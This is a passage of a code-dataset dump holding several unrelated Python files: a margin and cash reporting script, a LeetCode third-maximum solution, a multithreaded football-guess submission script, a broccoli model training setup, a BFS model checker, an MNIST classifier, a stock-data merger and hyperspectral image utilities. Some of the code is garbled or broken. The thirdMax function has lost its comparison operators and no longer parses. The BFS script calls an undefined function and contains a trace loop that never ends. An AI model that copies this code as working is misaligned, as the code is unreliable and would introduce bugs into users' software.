on=[\"Client\", \"Currency\", \"AccountType\"], how=\"left\")\n\tmargin_df = pd.merge(margin_df, excs_mv_df, on=[\"Client\", \"Currency\", \"AccountType\"], how=\"left\")\n\n\tmargin_df[\"SDMV\"] = margin_df[\"SDMV\"].fillna(margin_df[\"ESDMV\"])\n\tmargin_df[\"SDMV\"] = margin_df[\"SDMV\"].fillna(margin_df[\"SSDMV\"])\n\tmargin_df[\"TDMV\"] = margin_df[\"TDMV\"].fillna(margin_df[\"STDMV\"])\n\tmargin_df[\"TDMV\"] = margin_df[\"TDMV\"].fillna(margin_df[\"ETDMV\"])\n\tmargin_df[\"LongDiscountValue\"] = margin_df[\"LongDiscountValue\"].fillna(margin_df[\"ExcsDiscountValue\"])\n\tmargin_df.loc[(margin_df.AccountType == 'L') | (margin_df.AccountType == 'B') | (margin_df.AccountType == 'X'), \"Margin\"] = -margin_df[\"LongDiscountValue\"]\n\tmargin_df.loc[(margin_df.AccountType == 'L') | (margin_df.AccountType == 'B'), \"Collateral\"] = margin_df[\"TDMV\"] - margin_df[\"LongDiscountValue\"]\n\tmargin_df.loc[margin_df.AccountType == 'X', \"Collateral\"] = margin_df[\"SDMV\"] - margin_df[\"LongDiscountValue\"]\n\tmargin_df.loc[margin_df.AccountType == 'F', \"Collateral\"] = margin_df[\"SettledCash\"] + margin_df[\"UPnL\"]\n\tmargin_df.loc[margin_df.AccountType == 'B', \"SettledCash\"] = 0\n\n\treturn margin_df.drop([\"LongDiscountValue\", \"ExcsDiscountValue\", \"ESDMV\", \"SSDMV\", \"STDMV\", \"ETDMV\", \"UPnL\"], axis=1).fillna(0)\n\ndef merge_sbl(os_coll_df, pd_coll_df):\n\tos_coll_df[\"LOAN_TYPE\"] = \"OS\"\n\tpd_coll_df[\"LOAN_TYPE\"] = \"PD\"\n\treturn pd.concat([os_coll_df.rename(columns={x : x.replace(\"OS_\", \"\") for x in os_coll_df.columns if \"OS_\" in x}), \n\t\tpd_coll_df.rename(columns={x : x.replace(\"PD_\", \"\") for x in pd_coll_df.columns if \"PD_\" in x}) ], ignore_index=True)\n\ndef consol_output(margin_df, cash_df, eqt_mv_df, deriv_exp_df, eqt_shrt_coll_df, unsetl_trd, sbl_inv_df, fx_sbl_df):\n\tconsol_xlsx = pd.ExcelWriter(CONST_DIC[\"consol_data_file\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\")))\n\tmargin_df.to_excel(consol_xlsx, \"margin\", index=False)\n\tcash_df.to_excel(consol_xlsx, \"cash\", index=False)\n\teqt_mv_df.to_excel(consol_xlsx, \"eqt_mv\", index=False)\n\tderiv_exp_df.to_excel(consol_xlsx, \"deriv_exp\", index=False)\n\teqt_shrt_coll_df.to_excel(consol_xlsx, \"eqt_shrt_coll\", index=False)\n\tunsetl_trd.to_excel(consol_xlsx, \"unsetl_trd\", index=False)\n\tsbl_inv_df.to_excel(consol_xlsx, \"sbl_inv\", index=False)\n\tfx_sbl_df.to_excel(consol_xlsx, \"g1_fx\", index=False)\n\tconsol_xlsx.save()\n\tprint 
(CONST_DIC[\"consol_data_file\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\")))\n\n\treturn\n\ndef main():\n\t# CONST_DIC[\"cur_dt\"] = datetime.datetime.strptime(\"20181001\", \"%Y%m%d\")\n\tclient_df = import_client()\n\ttrd_df = import_trd(client_df)\n\tcash_df, exch_df = import_cash()\n\teqt_pos_df, fut_pos_df = import_positions(exch_df)\n\texposure_df = import_exposure()\n\tos_sbl_df, pd_sbl_df, fx_sbl_df = import_sbl()\n\n\tpd_coll_df = pd_sbl_calc(client_df, pd_sbl_df)\n\tos_coll_df = os_sbl_calc(client_df, os_sbl_df)\n\t\n\teqt_mv_df = eqt_ls_mv(client_df, eqt_pos_df, os_coll_df, pd_coll_df, exch_df)\n\tderiv_exp_df = fut_exp(client_df, fut_pos_df)\n\teqt_shrt_coll_df = eqt_shrt_coll(client_df, exposure_df)\n\t\n\tbalance_df, proj_df = cash_acc(client_df, cash_df, pd_coll_df, trd_df)\n\tsbl_inv_df = merge_sbl(os_coll_df, pd_coll_df)\n\tmargin_df = margin_req(balance_df, eqt_shrt_coll_df, eqt_mv_df)\n\n\tconsol_output(margin_df, proj_df, eqt_mv_df, deriv_exp_df, eqt_shrt_coll_df, trd_df, sbl_inv_df, fx_sbl_df)\n\treturn\n\nif __name__ == \"__main__\":\n\tprint (\"PB Cash Data\")\n\ttry:\n\t\t# for dt in list( rrule(DAILY, dtstart=datetime.datetime.strptime(\"20180919\", \"%Y%m%d\"), until=(datetime.datetime.now()+datetime.timedelta(days=-1)), byweekday=(MO,TU,WE,TH,FR)) ):\n\t\t# \tCONST_DIC[\"cur_dt\"] = dt\n\t\tif True:\n\t\t\tmain()\n\texcept KeyboardInterrupt:\n\t\tprint (\"Ctrl+C pressed. Stopping...\")","sub_path":"cash_pb_report/bin/cash_pb_data.py","file_name":"cash_pb_data.py","file_ext":"py","file_size_in_byte":26946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"134217556","text":"\"\"\"\nGiven a non-empty array of integers, return the third maximum number in this array. If it does not exist, return the maximum number. The time complexity must be in O(n).\n\nExample 1:\nInput: [3, 2, 1]\nOutput: 1\nExplanation: The third maximum is 1.\n\nExample 2:\nInput: [1, 2]\nOutput: 2\nExplanation: The third maximum does not exist, so the maximum (2) is returned instead.\n\nExample 3:\nInput: [2, 2, 3, 1]\nOutput: 1\nExplanation: Note that the third maximum here means the third maximum distinct number.\nBoth numbers with value 2 are both considered as second maximum.\n\"\"\"\n\nMIN = -999999999999\n\n\ndef thirdMax(nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n triMax = [MIN, MIN, nums[0]]\n for num in nums[1:]:\n if num>triMax[0] and numtriMax[1] and numtriMax[2]:\n triMax[0] = triMax[1]\n triMax[1] = triMax[2]\n triMax[2] = num\n \n if triMax[0]==MIN:\n return triMax[2]\n else:\n return triMax[0]\n \n\n\nif __name__ == '__main__':\n print('Thirdmax: [3,2,1] -> {}'.format(thirdMax([3,2,1])))\n print('Thirdmax: [1,2] -> {}'.format(thirdMax([1,2])))\n print('Thirdmax: [2,2,3,1] -> {}'.format(thirdMax([2,2,3,1])))","sub_path":"LeetCode/414_third-maximum-number.py","file_name":"414_third-maximum-number.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"109964330","text":"\nfrom main.football.Consumer import *\nfrom main.football.FlushConsumer import *\nfrom main.lib.metchMeta import *\nfrom main.football.Producer import *\nimport datetime\n\n\ndef main():\n threadNum = 300\n fp = open(\"data/user_id_message.txt\", \"r\")\n fout = open(\"data/result_message-{0}.txt\".format(datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S-%f\")), \"w\")\n resultList = []\n\n meta = getMatchMeta(\"owriLtzawu-1cVgzOYpfQSK_Hkq8\")\n\n print(\"===============猜球===========\")\n print(\"球赛总共 : {0} 场\".format(len(meta)))\n\n for i in range(len(meta)):\n choose = input(\"第 {0} 场: {1}(A), {2}(B), pint(C) : \".format(i, meta[i]['teamA']['name'], meta[i]['teamB']['name']))\n resItem = {}\n resItem['teamId'] = str(meta[i]['teamId'])\n if choose == \"A\":\n resItem['voteCountryId'] = meta[i]['teamA']['countryId']\n elif choose == \"B\":\n resItem['voteCountryId'] = meta[i]['teamB']['countryId']\n elif choose == \"C\":\n resItem['voteCountryId'] = 'ping'\n else:\n print(\"Your input error : [{0}], you should input [A , B , C]\".format(choose))\n return\n resultList.append(resItem)\n print(\"=====================================\")\n print(\"start: {0} ... \".format(datetime.datetime.now()))\n\n idQueue = Queue()\n resQueue = Queue()\n consumeNum = 0\n\n\n producter = Producer(idQueue, fp)\n lock = threading.Lock()\n\n idConsumerList = []\n\n for index in range(threadNum) :\n idConsumerList.append(Consumer(resultList, idQueue, resQueue, consumeNum, lock))\n\n flushConsumer = FlushConsumer(resQueue, consumeNum, lock, fout)\n\n\n producter.start()\n for index in range(threadNum):\n idConsumerList[index].start()\n flushConsumer.start()\n\n producter.join()\n for index in range(threadNum):\n idConsumerList[index].join()\n flushConsumer.join()\n\n\n\n print(\"finish: {0}\".format(datetime.datetime.now()))\n\n\nif __name__ == '__main__':\n main()","sub_path":"python/7-python-project/match-estimate/main/football/match-main.py","file_name":"match-main.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"549709187","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 6 14:28:17 2019\n\n@author: Arthur\n\n\"Interface\" for training broccoli model\n\nRequired input:\n -Path of train directory\n -Path of model directory (to save or load model)\n -Version and type of model\n -Feature extraction options (colour space and index) when training new model\n 'colour space: Lab, colour index: NDI' is a good choice\n -Epochs (10 epochs is fine)\n -Dimension of images for training: 'input_size' x 'input_size'\n For 10m height 64 is good, 30m 32 or less would be better\n -Batch size for training in batches\n -Settings:\n >Use AUGMENT_DATA to indicate whether to augment data (recommended)\n >Use TRAIN_FURTHER to indicate whether to further train a model or train new model\n When further training model 'name', a new model is saved named 'name+'\n\"\"\"\n\n#-----------------------------------------------------------------------------#\nimport sys\nsys.path.insert(1, r\"C:\\Users\\Arthur\\Documents\\Study\\Internship VanBoven\\Finished code\\Model broccoli\\Modules\")\n\nimport train_model as tm\n\n#-----------------------------------Paths-------------------------------------#\n# Data and model directory (if path to folder put '\\\\' at the end)\ntrain_dir = r\"C:\\Users\\Arthur\\Documents\\Study\\Internship VanBoven\\Data\\Project - Identifying Broccoli Heads\\Train\\\\\"\nmodel_dir = r\"C:\\Users\\Arthur\\Documents\\Study\\Internship VanBoven\\Project - Identifying Broccoli Heads\\Models\\\\\"\n\n#-----------------------------Feature extraction------------------------------#\nFE = {}\nFE['colour_space'] = ['Lab']\nFE['colour_index'] = ['NDI']\n\n#---------------------------------Settings------------------------------------#\nmodel_version = 201\nmodel_type = 'VGG16'\n\nepochs = 10\ninput_size = 64\nbatch_size = 32\n\nAUGMENT_DATA = True\nTRAIN_FURTHER = False\n\ntm.TrainModel(train_dir, FE, \n epochs, input_size, batch_size,\n model_version, model_type, model_dir,\n AUGMENT_DATA, TRAIN_FURTHER)","sub_path":"Model broccoli/TrainModel.py","file_name":"TrainModel.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"394234943","text":"# visits all the nodes of a graph (connected component) using BFS\nimport sys\nfrom importlib import util\nfrom timeit import default_timer as timer\n\n# Load the model\nif len(sys.argv) <2:\n\tprint(\"Error: No model specified.\")\n\tquit()\nprint(\"Loading model from \\\"{0}\\\"...\".format(sys.argv[1]), end = \"\", flush = True)\nspec = util.spec_from_file_location(\"model\", sys.argv[1])\nmodel = util.module_from_spec(spec)\nspec.loader.exec_module(model)\nnetwork = model.Network() # create network instance\nprint(\" done.\")\n# Print some information about the model and the initial state\nstart_time = timer()\nstart=network.get_initial_state()\nprint(\"The destination node of this transition is \", start)\n#for checking state space\nminCostProperties = [] #Keep a list of all minimal cost properties\nexistProperties = [] #Keep a list of all minimal exist properties\npropertiesFound = [False] * len(network.properties) # Keeps track of which properties have already been found\n\n# Sort properties based on kind\nprint(\"* The model has\", len(network.properties), \"properties.\")\ncounter = 0\nfor property in network.properties:\n if (property.exp is not None and property.exp.op == \"exists\" and property.exp.args[0].op == \"eventually\" and\n property.exp.args[0].args[0].op == \"ap\"):\n existProperties.append(counter) # We might have to use atomic proposition instead of index\n else:\n minCostProperties.append(property.exp.args[1].args[0])\n\n counter = counter + 1\n\n\ndef bfs_connected_component(graph, start):\n # keep track of all visited nodes\n explored = []\n # keep track of nodes to be checked\n queue = [start]\n # keep looping until there are nodes still to be checked\n while queue:\n # pop shallowest node (first node) from queue\n node = queue.pop(0)\n if node not in explored:\n # add node to list of checked nodes\n explored.append(node)\n print(len(explored))\n transitions = network.get_transitions(node)\n # print(\"The transition taken is: \", )\n #print (network.transition_labels[explored[0].label])\n for trans in transitions:\n next_state = network.jump_np(node, trans)\n print(\"The destination node of this transition is \", next_state)\n print(\"The index is \", network.transition_labels)\n queue.append(next_state)\n\n # Check if any exist properties hold.\n for i in existProperties:\n if (network.get_expression_value(node, i)) == True and propertiesFound[i] == False:\n print(\"\\n\\nWe have found a trace where the property holds\")\n propertiesFound[i] = True\n source = node\n traceList = []\n while (source!= network.get_initial_state()):\n traceList.append(source)\n traceList.reverse()\n for item in traceList:\n print(str(item), end=', ')\n print(\"The amount of notes visited was:\", len(explored))\n\n return explored\n\n\n#for checking properties\n\nbfs_connected_component(network,start)\nbfs_properties()\n\n\n\n\n\n\n","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"371274495","text":"''' author: samtenka\n changed: 2017-10-08\n created: 2017-10-07\n credits: www.tensorflow.org/get_started/mnist/pros\n descr: convolutional classifier on MNIST \n usage: Run `python convolutional.py`.\n'''\n\nimport tensorflow as tf\nimport numpy as np\n\n###############################################################################\n# 0. LIST PROGRAM PARAMETERS #\n###############################################################################\n\n# 0.0. (Hyper)Parameters of Stochastic Gradient Descent. (Notice the smaller\n# learning rate):\nTRAIN_TIME = 1000\nBATCH_SIZE= 100\nLEARNING_RATE = 0.01\n\n###############################################################################\n# 1. READ DATASET #\n###############################################################################\n\n# 0.0. MNIST is a classic image-classification dataset. Its images are 28x28 \n# grayscale photographs of handwritten digits (0 through 9). Note that\n# we load the labels in one-hot form. This makes defining a loss function\n# easier: \nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets('MNIST_data', one_hot=True)\n\ndef get_batch(size=BATCH_SIZE):\n ''' Return `inputs` of shape (28*28,) and the corresponding\n `outputs` of shape (10,)\n randomly sampled from the full data. \n '''\n inputs, outputs = mnist.train.next_batch(size)\n return inputs, outputs\n\n###############################################################################\n# 2. BUILD COMPUTATION GRAPH #\n###############################################################################\n\n# 2.0. Placeholders for the data to which to fit the model:\nTrueInputs = tf.placeholder(tf.float32, shape=[None, 28*28])\nTrueOutputs= tf.placeholder(tf.float32, shape=[None, 10])\n\n# 2.1. MODEL HYPERPARAMETERS:\nLearningRate = tf.placeholder(dtype=tf.float32)\nKeepProb = tf.placeholder(tf.float32)\n\n# 2.1. MODEL PARAMETERS (note the choice of initialization):\nWeightsA= tf.get_variable('Wa', shape=[5, 5, 1, 32], dtype=tf.float32, initializer=tf.contrib.layers.xavier_initializer_conv2d())\nBiasesA = tf.get_variable('Ba', shape=[ 32], dtype=tf.float32, initializer=tf.truncated_normal_initializer())\nWeightsB= tf.get_variable('Wb', shape=[3, 3, 32, 64], dtype=tf.float32, initializer=tf.contrib.layers.xavier_initializer_conv2d())\nBiasesB = tf.get_variable('Bb', shape=[ 64], dtype=tf.float32, initializer=tf.truncated_normal_initializer())\n\nWeightsC= tf.get_variable('Wc', shape=[5*5*64, 512], dtype=tf.float32, initializer=tf.contrib.layers.xavier_initializer())\nBiasesC = tf.get_variable('Bc', shape=[ 512], dtype=tf.float32, initializer=tf.truncated_normal_initializer())\nWeightsD= tf.get_variable('Wd', shape=[ 512, 10], dtype=tf.float32, initializer=tf.contrib.layers.xavier_initializer())\nBiasesD = tf.get_variable('Bd', shape=[ 10], dtype=tf.float32, initializer=tf.truncated_normal_initializer())\n\n# 2.2. 
BUILD CLASSIFIER:\ndef conv2d(x, W, stride=2, padding='VALID'):\n ''' Linear convolutional map '''\n return tf.nn.conv2d(x, W, strides=[1, stride, stride, 1], padding=padding)\n\ndef lrelu(x):\n ''' leaky ReLU activation function '''\n return tf.maximum(0.1*x, x)\n\nInputImages = tf.reshape(TrueInputs, [-1, 28, 28, 1])\nHiddenLayerA = lrelu(conv2d(InputImages, WeightsA) + BiasesA) # 12 x 12 x 32\nHiddenLayerB = lrelu(conv2d(HiddenLayerA, WeightsB) + BiasesB) # 5 x 5 x 64\n\nHiddenLayerC = lrelu(tf.matmul(tf.reshape(HiddenLayerB, [-1, 5*5*64]), WeightsC) + BiasesC)\nDropped = tf.nn.dropout(HiddenLayerC, KeepProb)\nPredictedOutputLogits = tf.matmul(Dropped, WeightsD) + BiasesD\n\n# 2.3. Gradient Descent acts to minimize a differentiable loss (here Cross Entropy):\nCrossEntropyLoss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=TrueOutputs, logits=PredictedOutputLogits))\n\n# 2.4. GRADIENT DESCENT STEP (note the change to ADAM):\nUpdate = tf.train.AdamOptimizer(LearningRate).minimize(CrossEntropyLoss)\n\n# 2.5. Classification Diagnostics (how well did we do?). Note the nice use of\n# `reduce_mean`. \nPredictionIsCorrect = tf.equal(tf.argmax(PredictedOutputLogits, 1), tf.argmax(TrueOutputs, 1))\nAccuracy = tf.reduce_mean(tf.cast(PredictionIsCorrect, tf.float32))\n\n###############################################################################\n# 3. RUN GRAPH #\n###############################################################################\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n \n # 3.0. Train the model...\n for i in range(TRAIN_TIME):\n batch_inputs, batch_outputs = get_batch() \n sess.run(Update, feed_dict={TrueInputs:batch_inputs, TrueOutputs:batch_outputs, LearningRate:LEARNING_RATE, KeepProb:0.5}) \n\n if i%50: continue\n batch_inputs, batch_outputs = get_batch() \n # Note that at test time, KeepProb becomes 1...\n train_accuracy = sess.run(Accuracy, feed_dict={TrueInputs:batch_inputs, TrueOutputs:batch_outputs, KeepProb:1.0})\n print('step %d, training accuracy %g' % (i, train_accuracy))\n\n # 3.1. Report the final model's accuracy:\n accuracy = sess.run(Accuracy, feed_dict={TrueInputs: mnist.test.images, TrueOutputs: mnist.test.labels, KeepProb:1.0})\n print('Final accuracy: %.3f' % accuracy)\n","sub_path":"PartA/convolutional.py","file_name":"convolutional.py","file_ext":"py","file_size_in_byte":5536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
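The "12 x 12 x 32" and "5 x 5 x 64" shape comments in the record above follow from the VALID-padding size formula out = floor((in - kernel) / stride) + 1; a quick check:

    def valid_out(size, kernel, stride):
        return (size - kernel) // stride + 1

    print(valid_out(28, 5, 2))                   # 12 -- first conv layer (5x5 kernel, stride 2)
    print(valid_out(valid_out(28, 5, 2), 3, 2))  # 5 -- second conv layer (3x3 kernel, stride 2)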
+{"seq_id":"582995358","text":"# imports\n\nimport os\nimport shutil\nimport string\nimport time # used to measure execution time\nfrom multiprocessing import Pool\n\nimport pandas as pd\n\ntrainingset_folder = \"D:/data_mt/09_training/\"\nstock_data_folder = trainingset_folder + \"stocks/\"\ncombine_data_folder = trainingset_folder + \"combined/\"\n\noverwrite = True\n\ndef create_dir_structure(startfolder: str):\n if not os.path.exists(startfolder):\n os.makedirs(startfolder)\n\n for char in string.ascii_uppercase:\n folder = startfolder + char + \"/\"\n directory = os.path.dirname(folder)\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef load_additional_info() -> pd.DataFrame:\n return pd.read_csv(trainingset_folder + \"company_info.csv\", sep=',', encoding='utf-8', header=0)\n\n\ndef load_reports():\n df = pd.read_csv(trainingset_folder + \"company_reports.csv\", header=0)\n df.period = pd.to_datetime(df.period)\n df.filed = pd.to_datetime(df.filed)\n return df\n\n\ndef load_stock_history(ticker: str):\n df = pd.read_csv(stock_data_folder + ticker[0] + \"/\" + ticker + \".csv\")\n df.Date = pd.to_datetime(df.Date)\n return df\n\n\ndef merge_dataframes(ticker, ticker_fd_data):\n ticker_stock_data = load_stock_history(ticker)\n ticker_stock_data = ticker_stock_data[ticker_stock_data.Date > \"2012-01-01\"]\n ticker_stock_data['i_date'] = ticker_stock_data.Date\n ticker_stock_data.set_index('i_date', inplace=True)\n\n ticker_fd_data['i_date'] = ticker_fd_data.filed\n ticker_fd_data.set_index('i_date', inplace=True)\n\n combined_data = pd.merge(ticker_fd_data, ticker_stock_data, left_index=True, right_index=True, how='outer')\n combined_data.sort_index(inplace=True)\n\n combined_data = combined_data.fillna(method=\"ffill\")\n combined_data = combined_data.dropna(subset=['filed', 'Date'])\n\n combined_data['ticker'] = combined_data.ticker_x\n combined_data.drop(columns=['ticker_x', 'ticker_y'])\n\n return combined_data\n\n\ndef create_price_ratio_features(combined_data, shares_outstanding):\n combined_data['pr_p2e'] = combined_data.Close * shares_outstanding / (\n combined_data.c_NetIncomeLoss - combined_data.c_PaymentsOfDividendsTotal)\n combined_data['pr_p2b'] = combined_data.Close * shares_outstanding / (\n combined_data.Assets - combined_data.Liabilities)\n combined_data['pr_p2egr_1y'] = combined_data.pr_p2e / (\n combined_data.gr_netincome_p * 100) # approximated / denominator in percent\n\n # caping p2e: in order to prevent meaningless values, we need to restrict the range. The max value is limited to 100.\n # if new_df.c_NetIncomeLoss - new_df.c_PaymentsOfDividendsTotal results in a negativ value, we set p2e to 100, which is rather a \"bad\" value.\n combined_data.loc[(combined_data.pr_p2e < 0) | (combined_data.pr_p2e > 100), 'pr_p2e'] = 100\n\n # caping p2egr: the lower the better. 
generally you would like to see a ratio lower than 1, so a 5 can be considered a really bad value so we restrict it to 5\n # if growth number is 0 or less, we set p2egr to 5\n combined_data.loc[(combined_data.pr_p2egr_1y > 5) | (combined_data.pr_p2egr_1y <= 0.0), 'pr_p2egr_1y'] = 5\n\n\ndef find_10_day_max(date, close, df):\n date_low = date + pd.DateOffset(days=180)\n date_high = date + pd.DateOffset(days=360)\n\n # return df[(df.Date >= date_low) & ((df.Date <= date_high))].Close.max()\n close_list = df[(df.Date >= date_low) & (df.Date <= date_high)].Close.sort_values(ascending=False).to_list()\n if len(close_list) >= 10:\n return close_list[9]\n return 0\n\n\ndef calculate_potential(combined_data):\n combined_data['c_max_10day'] = combined_data.apply(lambda row : find_10_day_max(row['Date'], row['Close'], combined_data), axis = 1)\n combined_data['r_potential'] = (combined_data.c_max_10day / combined_data.Close) - 1\n\n\ndef process_ticker(data_tuple):\n try:\n ticker = data_tuple[0]\n ticker_fd_data = data_tuple[1]\n ticker_add_info = data_tuple[2]\n\n new_file = combine_data_folder + ticker[0] + \"/\" + ticker + \".csv\"\n\n print('process: ', ticker, end=\"\")\n if os.path.isfile(new_file) & (overwrite is False):\n print(\" skip\")\n return\n\n print(\"...\")\n\n shares_outstanding = ticker_add_info.sharesOutstanding.to_list()[0]\n\n combined_data = merge_dataframes(ticker, ticker_fd_data)\n create_price_ratio_features(combined_data, shares_outstanding)\n calculate_potential(combined_data)\n\n combined_data.to_csv(new_file, sep=',', encoding='utf-8', index=False)\n except Exception as e:\n print(e)\n\n \ndef data_generator():\n add_info = load_additional_info()\n fd_data = load_reports()\n tickers = add_info.ticker.unique()\n print(len(tickers))\n\n for ticker in tickers:\n ticker_fd_data = fd_data[fd_data.ticker == ticker].copy()\n ticker_add_info = add_info[add_info.ticker == ticker]\n\n yield ticker, ticker_fd_data, ticker_add_info\n\n\nif __name__ == '__main__':\n if overwrite:\n shutil.rmtree(combine_data_folder,ignore_errors = True)\n\n create_dir_structure(combine_data_folder)\n\n start = time.time()\n # serial\n # for data_tuple in data_generator():\n # process_ticker(data_tuple)\n\n\n #parallel\n # needs about 30 minutes...\n pool = Pool(8)\n pool.map(process_ticker, data_generator())\n pool.close()\n pool.join()\n\n print(\"duration: \", time.time() - start)\n\n","sub_path":"99_01_combine_finance_stock_data.py","file_name":"99_01_combine_finance_stock_data.py","file_ext":"py","file_size_in_byte":5480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
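merge_dataframes in the record above combines sparse report dates with daily prices by outer-joining on a date index and forward-filling; a tiny reproduction of that trick with made-up data:

    import pandas as pd

    prices = pd.DataFrame({"Close": [10.0, 11.0, 12.0]},
                          index=pd.to_datetime(["2020-01-02", "2020-01-03", "2020-01-06"]))
    filings = pd.DataFrame({"eps": [1.5]},
                           index=pd.to_datetime(["2020-01-03"]))

    combined = pd.merge(filings, prices, left_index=True, right_index=True, how="outer")
    combined = combined.sort_index().fillna(method="ffill")
    print(combined)
    # eps is NaN on 2020-01-02 (nothing to carry forward yet),
    # then 1.5 is carried forward to every later trading day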
+{"seq_id":"107679117","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nFileName: hsiUtilities\nAuthor Name: Arun M Saranathan\nDescription: This file includes implementation of specific utility functions which are used for CRISM data\n processing\nDate Created: 19th February 2019\nLast Modified: 03rd September 2019\n\"\"\"\nimport numpy as np\nfrom scipy import interpolate\nimport spectral.io.envi as envi\nfrom scipy import ndimage\n\nfrom generalUtilities import generalUtilities\n\nclass hsiUtilities():\n def hsiSpatialSmoothing(self, crImgName, filtersize=5):\n \"\"\"\n This function can be used to perform a spatial smoothing on an Hyperspectral image and save it.\n\n :param crImgName: the name of the file we want to smooth\n :param filtersize: the filter size\n :return: the name of the saved smoothed image\n \"\"\"\n crHdrName = crImgName.replace('.img', '.hdr')\n header = envi.read_envi_header(crHdrName)\n 'Read in the background image'\n crImg = envi.open(crHdrName, crImgName)\n crCube = crImg.load()\n [rows, cols, bands] = crCube.shape\n t1 = crImgName.rfind('/')\n temp = crImgName[(t1+1):]\n if ((temp.find('FRT') != -1) or (temp.find('FRS') != -1)):\n strtCol = 29\n stopCol = -7\n else:\n if ((temp.find('HRL') != -1) or (temp.find('HRS') != -1)):\n strtCol = 15\n stopCol = -4\n\n crCube = crCube[:, strtCol:stopCol, 4:244]\n\n 'Initialize matrix to nans'\n crCube_smoothed = np.empty((rows, cols, bands), dtype=float)\n crCube_smoothed[:] = np.nan\n\n for ii in range(240):\n bandImg = np.squeeze(crCube[:, :, ii])\n bandImg_smooth = ndimage.uniform_filter(bandImg, size=filtersize)\n crCube_smoothed[:, strtCol:stopCol, ii + 4] = bandImg_smooth\n\n outFileName = crImgName.replace('.img', ('_smoothed' + str(filtersize) + '.hdr'))\n envi.save_image(outFileName, crCube_smoothed, dtype=np.float32, force=True,\n interleave='bil', metadata=header)\n\n return outFileName\n\n def scaleSpectra(self, data, scaleMin=0.02):\n \"\"\"\n This function scales every row so that it has the same minimum value.\n\n :param data: A numpy matrix where the rows are individual spectra.\n :param scaleMin: 1 - The smallest value that the spectra should have (default = 0.02)\n :return: scaled matrix\n \"\"\"\n\n 'First subtract 1 and set everything at 1 to 0'\n data_shft = data - 1\n 'divide by the minimum in each row'\n data_min = data_shft.min(axis=1)\n\n data_scale = np.zeros(data.shape)\n\n 'Scale each endmember and create plots to see what it looks like'\n for ii in range(data.shape[0]):\n temp = data_shft[ii, :] / data_min[ii]\n data_scale[ii, :] = temp * -1 * scaleMin\n\n return (data_scale + 1)\n\n def hsiFlip(self, imgName):\n \"\"\"\n This function can be used to flip the image upside down. 
This is often required in the case of CRISM images as\n the data is the pds is arranged in the reverse order\n\n :param imgName: The address of the image to be flipped\n ----------------------------------------------------------------------------------------------------------------\n OUTPUT\n ----------------------------------------------------------------------------------------------------------------\n :return: outFileName: The name of the file with the convex background\n \"\"\"\n\n imgHdrName = imgName.replace(\".img\", \".hdr\")\n 'Now load the image'\n img = envi.open(imgHdrName, imgName)\n header = envi.read_envi_header(imgHdrName)\n cube = img.load()\n [_, _, bands] = img.shape\n\n 'Get the wavelength information'\n wvl = header['wavelength']\n wvl = np.asarray(wvl, dtype=np.float32)\n\n 'Flip the image and the wavelengths'\n cube_flip = np.flip(cube, axis=2)\n wvl = np.flip(wvl, axis=0)\n header['wavelength'] = wvl\n\n if header['default bands']:\n defaultBands = np.asarray(header['default bands'], dtype=np.int)\n defaultBands = bands - defaultBands\n header['default bands'] = defaultBands\n\n 'Save the flipped data'\n outFileName = imgName.replace(\".img\", \"_flip.hdr\")\n envi.save_image(outFileName, cube_flip, dtype='single', force=True, interleave='bil', metadata=header)\n\n return outFileName\n\n def hsiNan_fill(self, imgHdrName):\n \"\"\"\n This function can be used to fill in the nans based on the other data in the image.\n\n :param imgHdrName: location of the HDR file associated with the envi image of choice\n :return:\n \"\"\"\n imgName = imgHdrName.replace('.hdr', '.img')\n header = envi.read_envi_header(imgHdrName)\n 'Read in the background image'\n crImg = envi.open(imgHdrName, imgName)\n crCube = crImg.load()\n [rows, cols, bands] = crCube.shape\n\n arrCrImg = crCube.reshape((rows * cols, bands))\n 'Fill the NaNs in the columns'\n arrCrImg = generalUtilities().fill_nan(arrCrImg)\n 'Fill the NaNs in the rows'\n arrCrImgCrop = arrCrImg[:, 4:244]\n arrCrImgCrop = generalUtilities().fill_nan(arrCrImgCrop.T)\n arrCrImg[:, 4:244] = arrCrImgCrop.T\n 'Reshape to image size'\n crCube_nr = arrCrImg.reshape((rows, cols, bands))\n\n 'Save the background image'\n outFileName1 = imgName.replace('.img', '_CRnR.hdr')\n envi.save_image(outFileName1, crCube_nr, dtype='single',\n force=True, interleave='bil', metadata=header)\n\n return outFileName1\n\n \"\"\"\n def hsiImgSmooth(self, imgHdrName, strtCol=0, stopCol=0):\n '''\n\n :param imgHdrName:\n :return:\n '''\n imgName = imgHdrName.replace('.hdr', '.img')\n header = envi.read_envi_header(imgHdrName)\n\n 'Read in the background image'\n crImg = envi.open(imgHdrName, imgName)\n crCube = crImg.load()\n\n crCube = crCube[:, strtCol:stopCol, 4:244]\n\n 'Initialize matrix to nans'\n crCube_smoothed = np.empty((rows, cols, bands), dtype=float)\n crCube_smoothed[:] = np.nan\n\n for ii in range(240):\n bandImg = np.squeeze(crCube[:, :, ii])\n bandImg_smooth = ndimage.uniform_filter(bandImg, size=5)\n crCube_smoothed[:, strtCol:stopCol, ii + 4] = bandImg_smooth\n\n outFileName = 